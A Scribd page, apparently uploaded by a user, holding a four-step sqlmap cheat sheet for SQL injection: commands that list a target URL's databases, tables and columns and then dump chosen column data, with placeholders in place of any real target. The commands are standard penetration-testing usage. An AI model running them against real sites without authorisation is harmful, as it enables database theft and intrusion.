0% found this document useful (0 votes)
8 views1 page

SQLMap Database Extraction Guide

The document outlines a series of SQL injection commands using sqlmap to extract information from a target database. It includes steps to acquire databases, tables, columns, and to dump data from specific columns. Each step is accompanied by the corresponding command syntax for execution.

Uploaded by

Asril
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
8 views1 page

SQLMap Database Extraction Guide

The document outlines a series of SQL injection commands using sqlmap to extract information from a target database. It includes steps to acquire databases, tables, columns, and to dump data from specific columns. Each step is accompanied by the corresponding command syntax for execution.

Uploaded by

Asril
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd

1.

Acquire databases list


~$ sqlmap -u "[TARGET URL]" --dbs

2. Acquire tables list


~$ sqlmap -u "[TARGET URL]" -D [DATABASE_NAME] --tables

3. Acquire columns list


~$ sqlmap -u "[TARGET URL]" -D [DATABASE_NAME] -T [TABLE_NAME] --columns

4. dump the data


~$ sqlmap -u "[TARGET URL]" -D [DATABASE_NAME] -T [TABLE_NAME] -C [COLUMN_NAME] --
dump

You might also like